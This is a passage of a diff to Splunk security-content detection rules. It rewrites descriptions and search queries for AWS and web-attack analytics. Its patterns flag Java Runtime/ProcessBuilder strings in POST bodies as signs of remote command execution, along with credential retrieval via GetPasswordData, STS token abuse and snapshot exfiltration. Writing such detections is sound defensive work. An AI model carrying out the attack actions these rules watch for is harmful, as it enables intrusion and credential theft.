type: Anomaly
|
||||
description: This search looks for suspicious Java classes that are often used to
|
||||
exploit remote command execution in common Java frameworks, such as Apache Struts.
|
||||
description: The following analytic identifies suspicious Java classes often used
|
||||
for remote command execution exploits in Java frameworks like Apache Struts. It
|
||||
detects this activity by analyzing HTTP POST requests with specific content patterns
|
||||
using Splunk's `stream_http` data source. This behavior is significant because it
|
||||
may indicate an attempt to exploit vulnerabilities in web applications, potentially
|
||||
leading to unauthorized remote code execution. If confirmed malicious, this activity
|
||||
could allow attackers to execute arbitrary commands on the server, leading to data
|
||||
breaches, system compromise, and further network infiltration.
|
||||
data_source: []
|
||||
search: '`stream_http` http_method=POST http_content_length>1 | regex form_data="(?i)java\.lang\.(?:runtime|processbuilder)"
|
||||
| rename src_ip as src | stats count earliest(_time) as firstTime, latest(_time)
|
||||
|
||||
@@ -1,14 +1,19 @@
|
||||
name: Abnormally High Number Of Cloud Infrastructure API Calls
|
||||
id: 0840ddf1-8c89-46ff-b730-c8d6722478c0
|
||||
version: 1
|
||||
date: '2020-09-07'
|
||||
version: 2
|
||||
date: '2024-05-12'
|
||||
author: David Dorsey, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search will detect a spike in the number of API calls made to your
|
||||
cloud infrastructure environment by a user.
|
||||
data_source:
|
||||
- AWS CloudTrail
|
||||
description: The following analytic detects a spike in the number of API calls made
|
||||
to your cloud infrastructure by a user. It leverages cloud infrastructure logs and
|
||||
compares the current API call volume against a baseline probability density function
|
||||
to identify anomalies. This activity is significant because an unusual increase
|
||||
in API calls can indicate potential misuse or compromise of cloud resources. If
|
||||
confirmed malicious, this could lead to unauthorized access, data exfiltration,
|
||||
or disruption of cloud services, posing a significant risk to the organization's
|
||||
cloud environment.
|
||||
data_source: []
|
||||
search: '| tstats count as api_calls values(All_Changes.command) as command from datamodel=Change
|
||||
where All_Changes.user!=unknown All_Changes.status=success by All_Changes.user _time
|
||||
span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time,
|
||||
@@ -23,7 +28,7 @@ search: '| tstats count as api_calls values(All_Changes.command) as command from
|
||||
how_to_implement: You must be ingesting your cloud infrastructure logs. You also must
|
||||
run the baseline search `Baseline Of Cloud Infrastructure API Calls Per User` to
|
||||
create the probability density function.
|
||||
known_false_positives: 'None.'
|
||||
known_false_positives: None.
|
||||
references: []
|
||||
tags:
|
||||
analytic_story:
|
||||
@@ -56,7 +61,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,13 +1,18 @@
|
||||
name: Abnormally High Number Of Cloud Security Group API Calls
|
||||
id: d4dfb7f3-7a37-498a-b5df-f19334e871af
|
||||
version: 1
|
||||
date: '2020-09-07'
|
||||
version: 2
|
||||
date: '2024-05-22'
|
||||
author: David Dorsey, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search will detect a spike in the number of API calls made to your
|
||||
cloud infrastructure environment about security groups by a user.
|
||||
data_source:
|
||||
description: The following analytic detects a spike in the number of API calls made
|
||||
to cloud security groups by a user. It leverages data from the Change data model,
|
||||
focusing on successful firewall-related changes. This activity is significant because
|
||||
an abnormal increase in security group API calls can indicate potential malicious
|
||||
activity, such as unauthorized access or configuration changes. If confirmed malicious,
|
||||
this could allow an attacker to manipulate security group settings, potentially
|
||||
exposing sensitive resources or disrupting network security controls.
|
||||
data_source:
|
||||
- AWS CloudTrail
|
||||
search: '| tstats count as security_group_api_calls values(All_Changes.command) as
|
||||
command from datamodel=Change where All_Changes.object_category=firewall AND All_Changes.status=success
|
||||
@@ -58,7 +63,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,12 +1,17 @@
|
||||
name: Amazon EKS Kubernetes cluster scan detection
|
||||
id: 294c4686-63dd-4fe6-93a2-ca807626704a
|
||||
version: 1
|
||||
date: '2020-04-15'
|
||||
version: 2
|
||||
date: '2024-05-15'
|
||||
author: Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: Hunting
|
||||
description: This search provides information of unauthenticated requests via user
|
||||
agent, and authentication data against Kubernetes cluster in AWS
|
||||
description: The following analytic detects unauthenticated requests to an Amazon
|
||||
EKS Kubernetes cluster, specifically identifying actions by the "system:anonymous"
|
||||
user. It leverages AWS CloudWatch Logs data, focusing on user agents and authentication
|
||||
details. This activity is significant as it may indicate unauthorized scanning or
|
||||
probing of the Kubernetes cluster, which could be a precursor to an attack. If confirmed
|
||||
malicious, this could lead to unauthorized access, data exfiltration, or disruption
|
||||
of services within the Kubernetes environment.
|
||||
data_source: []
|
||||
search: '`aws_cloudwatchlogs_eks` "user.username"="system:anonymous" userAgent!="AWS
|
||||
Security Scanner" | rename sourceIPs{} as src_ip | stats count min(_time) as firstTime
|
||||
|
||||
@@ -1,14 +1,19 @@
|
||||
name: AWS Credential Access GetPasswordData
|
||||
id: 4d347c4a-306e-41db-8d10-b46baf71b3e2
|
||||
version: 1
|
||||
date: '2022-08-10'
|
||||
version: 2
|
||||
date: '2024-05-21'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This detection analytic identifies more than 10 GetPasswordData API calls
|
||||
made to your AWS account with a time window of 5 minutes. Attackers can retrieve
|
||||
the encrypted administrator password for a running Windows instance.
|
||||
data_source:
|
||||
description: The following analytic identifies more than 10 GetPasswordData API calls
|
||||
within a 5-minute window in your AWS account. It leverages AWS CloudTrail logs to
|
||||
detect this activity by counting the distinct instance IDs accessed. This behavior
|
||||
is significant as it may indicate an attempt to retrieve encrypted administrator
|
||||
passwords for running Windows instances, which is a critical security concern. If
|
||||
confirmed malicious, attackers could gain unauthorized access to administrative
|
||||
credentials, potentially leading to full control over the affected instances and
|
||||
further compromise of the AWS environment.
|
||||
data_source:
|
||||
- AWS CloudTrail GetPasswordData
|
||||
search: '`cloudtrail` eventName=GetPasswordData eventSource = ec2.amazonaws.com | bin
|
||||
_time span=5m | stats count values(errorCode) as errorCode dc(requestParameters.instanceId)
|
||||
@@ -63,7 +68,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1552/aws_getpassworddata/aws_cloudtrail_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1552/aws_getpassworddata/aws_cloudtrail_events.json
|
||||
source: aws_cloudtrail
|
||||
sourcetype: aws:cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,12 +1,18 @@
|
||||
name: AWS Cross Account Activity From Previously Unseen Account
|
||||
id: 21193641-cb96-4a2c-a707-d9b9a7f7792b
|
||||
version: 1
|
||||
date: '2020-05-28'
|
||||
version: 2
|
||||
date: '2024-05-16'
|
||||
author: Rico Valdez, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search looks for AssumeRole events where an IAM role in a different
|
||||
account is requested for the first time.
|
||||
description: The following analytic identifies AssumeRole events where an IAM role
|
||||
in a different AWS account is accessed for the first time. It detects this activity
|
||||
by analyzing authentication logs and comparing the requesting and requested account
|
||||
IDs, flagging new cross-account activities. This behavior is significant because
|
||||
unauthorized cross-account access can indicate potential lateral movement or privilege
|
||||
escalation attempts. If confirmed malicious, an attacker could gain unauthorized
|
||||
access to resources in another account, potentially leading to data exfiltration,
|
||||
service disruption, or further compromise of the AWS environment.
|
||||
data_source: []
|
||||
search: '| tstats min(_time) as firstTime max(_time) as lastTime from datamodel=Authentication
|
||||
where Authentication.signature=AssumeRole by Authentication.vendor_account Authentication.user
|
||||
@@ -62,7 +68,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,12 +1,17 @@
|
||||
name: aws detect attach to role policy
|
||||
id: 88fc31dd-f331-448c-9856-d3d51dd5d3a1
|
||||
version: 1
|
||||
date: '2020-07-27'
|
||||
version: 2
|
||||
date: '2024-05-12'
|
||||
author: Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: Hunting
|
||||
description: This search provides detection of an user attaching itself to a different
|
||||
role trust policy. This can be used for lateral movement and escalation of privileges.
|
||||
description: The following analytic identifies a user attaching a policy to a different
|
||||
role's trust policy in AWS. It leverages CloudWatch logs to detect the `attach policy`
|
||||
event, extracting relevant fields such as `policyArn`, `sourceIPAddress`, and `userIdentity`.
|
||||
This activity is significant as it can indicate attempts at lateral movement or
|
||||
privilege escalation within the AWS environment. If confirmed malicious, an attacker
|
||||
could gain elevated permissions, potentially compromising sensitive resources and
|
||||
data within the AWS infrastructure.
|
||||
data_source: []
|
||||
search: '`aws_cloudwatchlogs_eks` attach policy| spath requestParameters.policyArn
|
||||
| table sourceIPAddress user_access_key userIdentity.arn userIdentity.sessionContext.sessionIssuer.arn
|
||||
|
||||
@@ -1,13 +1,16 @@
|
||||
name: aws detect permanent key creation
|
||||
id: 12d6d713-3cb4-4ffc-a064-1dca3d1cca01
|
||||
version: 1
|
||||
date: '2020-07-27'
|
||||
version: 2
|
||||
date: '2024-05-23'
|
||||
author: Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: Hunting
|
||||
description: This search provides detection of accounts creating permanent keys. Permanent
|
||||
keys are not created by default and they are only needed for programmatic calls.
|
||||
Creation of Permanent key is an important event to monitor.
|
||||
description: The following analytic detects the creation of permanent access keys
|
||||
in AWS accounts. It leverages CloudWatch logs to identify events where the `CreateAccessKey`
|
||||
action is performed by IAM users. Monitoring the creation of permanent keys is crucial
|
||||
as they are not created by default and are typically used for programmatic access.
|
||||
If confirmed malicious, this activity could allow attackers to gain persistent access
|
||||
to AWS resources, potentially leading to unauthorized actions and data exfiltration.
|
||||
data_source: []
|
||||
search: '`aws_cloudwatchlogs_eks` CreateAccessKey | spath eventName | search eventName=CreateAccessKey
|
||||
"userIdentity.type"=IAMUser | table sourceIPAddress userName userIdentity.type userAgent
|
||||
|
||||
@@ -1,13 +1,18 @@
|
||||
name: aws detect sts assume role abuse
|
||||
id: 8e565314-b6a2-46d8-9f05-1a34a176a662
|
||||
version: 1
|
||||
date: '2020-07-27'
|
||||
version: 2
|
||||
date: '2024-05-20'
|
||||
author: Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: Hunting
|
||||
description: This search provides detection of suspicious use of sts:AssumeRole. These
|
||||
tokens can be created on the go and used by attackers to move laterally and escalate
|
||||
privileges.
|
||||
description: The following analytic identifies suspicious use of the AWS STS AssumeRole
|
||||
action. It leverages AWS CloudTrail logs to detect instances where roles are assumed,
|
||||
focusing on specific fields like source IP address, user ARN, and role names. This
|
||||
activity is significant because attackers can use assumed roles to move laterally
|
||||
within the AWS environment and escalate privileges. If confirmed malicious, this
|
||||
could allow attackers to gain unauthorized access to sensitive resources, execute
|
||||
code, or further entrench themselves within the environment, leading to potential
|
||||
data breaches or service disruptions.
|
||||
data_source: []
|
||||
search: '`cloudtrail` user_type=AssumedRole userIdentity.sessionContext.sessionIssuer.type=Role
|
||||
| table sourceIPAddress userIdentity.arn user_agent user_access_key status action
|
||||
|
||||
@@ -1,13 +1,17 @@
|
||||
name: aws detect sts get session token abuse
|
||||
id: 85d7b35f-b8b5-4b01-916f-29b81e7a0551
|
||||
version: 1
|
||||
date: '2020-07-27'
|
||||
version: 2
|
||||
date: '2024-05-14'
|
||||
author: Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: Hunting
|
||||
description: This search provides detection of suspicious use of sts:GetSessionToken.
|
||||
These tokens can be created on the go and used by attackers to move laterally and
|
||||
escalate privileges.
|
||||
description: The following analytic identifies the suspicious use of the AWS STS GetSessionToken
|
||||
API call. It leverages CloudWatch logs to detect instances where this API is invoked,
|
||||
focusing on fields such as source IP address, event time, user identity, and status.
|
||||
This activity is significant because attackers can use these tokens to move laterally
|
||||
within the AWS environment and escalate privileges. If confirmed malicious, this
|
||||
could lead to unauthorized access and control over AWS resources, potentially compromising
|
||||
sensitive data and critical infrastructure.
|
||||
data_source: []
|
||||
search: '`aws_cloudwatchlogs_eks` ASIA userIdentity.type=IAMUser| spath eventName
|
||||
| search eventName=GetSessionToken | table sourceIPAddress eventTime userIdentity.arn
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: AWS Detect Users with KMS keys performing encryption S3
|
||||
id: 884a5f59-eec7-4f4a-948b-dbde18225fdc
|
||||
version: 2
|
||||
date: '2022-11-11'
|
||||
version: 3
|
||||
date: '2024-05-18'
|
||||
author: Rod Soto, Patrick Bareiss Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search provides detection of users with KMS keys performing encryption
|
||||
specifically against S3 buckets.
|
||||
data_source:
|
||||
- AWS CloudTrail CopyObject
|
||||
description: The following analytic identifies users with KMS keys performing encryption
|
||||
operations on S3 buckets. It leverages AWS CloudTrail logs to detect the `CopyObject`
|
||||
event where server-side encryption with AWS KMS is specified. This activity is significant
|
||||
as it may indicate unauthorized or suspicious encryption of data, potentially masking
|
||||
exfiltration or tampering efforts. If confirmed malicious, an attacker could be
|
||||
encrypting sensitive data to evade detection or preparing it for exfiltration, posing
|
||||
a significant risk to data integrity and confidentiality.
|
||||
data_source: []
|
||||
search: '`cloudtrail` eventName=CopyObject requestParameters.x-amz-server-side-encryption="aws:kms"
|
||||
| rename requestParameters.bucketName AS bucketName, requestParameters.x-amz-copy-source
|
||||
AS src_file, requestParameters.key AS dest_file | stats count min(_time) as firstTime
|
||||
@@ -56,7 +60,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1486/s3_file_encryption/aws_cloudtrail_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1486/s3_file_encryption/aws_cloudtrail_events.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,17 +1,25 @@
|
||||
name: AWS EC2 Snapshot Shared Externally
|
||||
id: 2a9b80d3-6340-4345-b5ad-290bf3d222c4
|
||||
version: 3
|
||||
date: '2023-03-20'
|
||||
version: 4
|
||||
date: '2024-05-07'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: The following analytic utilizes AWS CloudTrail events to identify when
|
||||
an EC2 snapshot permissions are modified to be shared with a different AWS account.
|
||||
This method is used by adversaries to exfiltrate the EC2 snapshot.
|
||||
data_source:
|
||||
description: The following analytic detects when an EC2 snapshot is shared with an
|
||||
external AWS account by analyzing AWS CloudTrail events. This detection method leverages
|
||||
CloudTrail logs to identify modifications in snapshot permissions, specifically
|
||||
when the snapshot is shared outside the originating AWS account. This activity is
|
||||
significant as it may indicate an attempt to exfiltrate sensitive data stored in
|
||||
the snapshot. If confirmed malicious, an attacker could gain unauthorized access
|
||||
to the snapshot's data, potentially leading to data breaches or further exploitation
|
||||
of the compromised information.
|
||||
data_source:
|
||||
- AWS CloudTrail ModifySnapshotAttribute
|
||||
search: '`cloudtrail` eventName=ModifySnapshotAttribute | rename requestParameters.createVolumePermission.add.items{}.userId
|
||||
as requested_account_id | search requested_account_id != NULL | eval match=if(requested_account_id==aws_account_id,"Match","No Match") | table _time user_arn src_ip requestParameters.attributeType requested_account_id aws_account_id match vendor_region user_agent userIdentity.principalId | where match = "No Match" | `aws_ec2_snapshot_shared_externally_filter` '
|
||||
as requested_account_id | search requested_account_id != NULL | eval match=if(requested_account_id==aws_account_id,"Match","No
|
||||
Match") | table _time user_arn src_ip requestParameters.attributeType requested_account_id
|
||||
aws_account_id match vendor_region user_agent userIdentity.principalId | where match
|
||||
= "No Match" | `aws_ec2_snapshot_shared_externally_filter` '
|
||||
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
|
||||
search works with AWS CloudTrail logs.
|
||||
known_false_positives: It is possible that an AWS admin has legitimately shared a
|
||||
@@ -63,7 +71,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1537/aws_snapshot_exfil/aws_cloudtrail_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1537/aws_snapshot_exfil/aws_cloudtrail_events.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,17 +1,33 @@
|
||||
name: AWS ECR Container Scanning Findings High
|
||||
id: 30a0e9f8-f1dd-4f9d-8fc2-c622461d781c
|
||||
version: 2
|
||||
date: '2023-11-09'
|
||||
version: 3
|
||||
date: '2024-05-12'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings
|
||||
with the results.
|
||||
data_source:
|
||||
description: The following analytic identifies high-severity findings from AWS Elastic
|
||||
Container Registry (ECR) image scans. It detects these activities by analyzing AWS
|
||||
CloudTrail logs for the DescribeImageScanFindings event, specifically filtering
|
||||
for findings with a high severity level. This activity is significant for a SOC
|
||||
because high-severity vulnerabilities in container images can lead to potential
|
||||
exploitation if not addressed. If confirmed malicious, attackers could exploit these
|
||||
vulnerabilities to gain unauthorized access, execute arbitrary code, or escalate
|
||||
privileges within the container environment, posing a significant risk to the overall
|
||||
security posture.
|
||||
data_source:
|
||||
- AWS CloudTrail DescribeImageScanFindings
|
||||
search: >-
|
||||
`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings | search severity=HIGH | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_high_filter`
|
||||
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs.
|
||||
`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings |
|
||||
spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand
|
||||
findings | spath input=findings | search severity=HIGH | rename name as finding_name,
|
||||
description as finding_description, requestParameters.imageId.imageDigest as imageDigest,
|
||||
requestParameters.repositoryName as repository, userIdentity.principalId as user
|
||||
| eval finding = finding_name.", ".finding_description | eval phase="release" |
|
||||
eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion,
|
||||
eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity
|
||||
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_high_filter`
|
||||
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
|
||||
search works with AWS CloudTrail logs.
|
||||
known_false_positives: unknown
|
||||
references:
|
||||
- https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html
|
||||
@@ -31,7 +47,7 @@ tags:
|
||||
role:
|
||||
- Attacker
|
||||
- name: repository
|
||||
type: Other
|
||||
type: Other
|
||||
role:
|
||||
- Victim
|
||||
product:
|
||||
@@ -53,6 +69,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
|
||||
@@ -1,16 +1,30 @@
|
||||
name: AWS ECR Container Scanning Findings Low Informational Unknown
|
||||
id: cbc95e44-7c22-443f-88fd-0424478f5589
|
||||
version: 2
|
||||
date: '2023-11-09'
|
||||
version: 3
|
||||
date: '2024-05-15'
|
||||
author: Patrick Bareiss, Eric McGinnis Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search looks for AWS CloudTrail events from AWS Elastic Container
|
||||
Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings
|
||||
with the results.
|
||||
data_source:
|
||||
description: The following analytic identifies low, informational, or unknown severity
|
||||
findings from AWS Elastic Container Registry (ECR) image scans. It leverages AWS
|
||||
CloudTrail logs, specifically the DescribeImageScanFindings event, to detect these
|
||||
findings. This activity is significant for a SOC as it helps in early identification
|
||||
of potential vulnerabilities or misconfigurations in container images, which could
|
||||
be exploited if left unaddressed. If confirmed malicious, these findings could lead
|
||||
to unauthorized access, data breaches, or further exploitation within the containerized
|
||||
environment.
|
||||
data_source:
|
||||
- AWS CloudTrail DescribeImageScanFindings
|
||||
search: '`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings| search severity IN ("LOW", "INFORMATIONAL", "UNKNOWN") | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="low" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_low_informational_unknown_filter`'
|
||||
search: '`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings
|
||||
| spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand
|
||||
findings | spath input=findings| search severity IN ("LOW", "INFORMATIONAL", "UNKNOWN")
|
||||
| rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest
|
||||
as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId
|
||||
as user | eval finding = finding_name.", ".finding_description | eval phase="release"
|
||||
| eval severity="low" | stats min(_time) as firstTime max(_time) as lastTime by
|
||||
awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding,
|
||||
phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
|
||||
| `aws_ecr_container_scanning_findings_low_informational_unknown_filter`'
|
||||
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
|
||||
search works with AWS CloudTrail logs.
|
||||
known_false_positives: unknown
|
||||
@@ -32,7 +46,7 @@ tags:
|
||||
role:
|
||||
- Attacker
|
||||
- name: repository
|
||||
type: Other
|
||||
type: Other
|
||||
role:
|
||||
- Victim
|
||||
product:
|
||||
@@ -54,6 +68,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
|
||||
@@ -1,17 +1,31 @@
|
||||
name: AWS ECR Container Scanning Findings Medium
|
||||
id: 0b80e2c8-c746-4ddb-89eb-9efd892220cf
|
||||
version: 2
|
||||
date: '2023-11-09'
|
||||
version: 3
|
||||
date: '2024-05-06'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search looks for AWS CloudTrail events from AWS Elastic Container
|
||||
Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings
|
||||
with the results.
|
||||
data_source:
|
||||
description: The following analytic identifies medium-severity findings from AWS Elastic
|
||||
Container Registry (ECR) image scans. It leverages AWS CloudTrail logs, specifically
|
||||
the DescribeImageScanFindings event, to detect vulnerabilities in container images.
|
||||
This activity is significant for a SOC as it highlights potential security risks
|
||||
in containerized applications, which could be exploited if not addressed. If confirmed
|
||||
malicious, these vulnerabilities could lead to unauthorized access, data breaches,
|
||||
or further exploitation within the container environment, compromising the overall
|
||||
security posture.
|
||||
data_source:
|
||||
- AWS CloudTrail DescribeImageScanFindings
|
||||
search: '`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings| search severity=MEDIUM | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user| eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="medium" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_medium_filter`'
|
||||
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs.
|
||||
search: '`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings
|
||||
| spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand
|
||||
findings | spath input=findings| search severity=MEDIUM | rename name as finding_name,
|
||||
description as finding_description, requestParameters.imageId.imageDigest as imageDigest,
|
||||
requestParameters.repositoryName as repository, userIdentity.principalId as user|
|
||||
eval finding = finding_name.", ".finding_description | eval phase="release" | eval
|
||||
severity="medium" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion,
|
||||
eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity
|
||||
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_medium_filter`'
|
||||
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
|
||||
search works with AWS CloudTrail logs.
|
||||
known_false_positives: unknown
|
||||
references:
|
||||
- https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html
|
||||
@@ -31,7 +45,7 @@ tags:
|
||||
role:
|
||||
- Attacker
|
||||
- name: repository
|
||||
type: Other
|
||||
type: Other
|
||||
role:
|
||||
- Victim
|
||||
product:
|
||||
@@ -53,6 +67,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
|
||||
@@ -1,19 +1,23 @@
|
||||
name: AWS Excessive Security Scanning
|
||||
id: 1fdd164a-def8-4762-83a9-9ffe24e74d5a
|
||||
version: 1
|
||||
date: '2021-04-13'
|
||||
version: 2
|
||||
date: '2024-05-08'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: This search looks for AWS CloudTrail events and analyse the amount of
|
||||
eventNames which starts with Describe by a single user. This indicates that this
|
||||
user scans the configuration of your AWS cloud environment.
|
||||
data_source:
|
||||
description: The following analytic identifies excessive security scanning activities
|
||||
in AWS by detecting a high number of Describe, List, or Get API calls from a single
|
||||
user. It leverages AWS CloudTrail logs to count distinct event names and flags users
|
||||
with more than 50 such events. This behavior is significant as it may indicate reconnaissance
|
||||
activities by an attacker attempting to map out your AWS environment. If confirmed
|
||||
malicious, this could lead to unauthorized access, data exfiltration, or further
|
||||
exploitation of your cloud infrastructure.
|
||||
data_source:
|
||||
- AWS CloudTrail
|
||||
search: '`cloudtrail` eventName=Describe* OR eventName=List* OR eventName=Get* |
|
||||
stats dc(eventName) as dc_events min(_time) as firstTime max(_time) as lastTime
|
||||
values(eventName) as command values(src) as src values(userAgent) as userAgent
|
||||
by user userIdentity.arn | where dc_events > 50 | `security_content_ctime(firstTime)`
|
||||
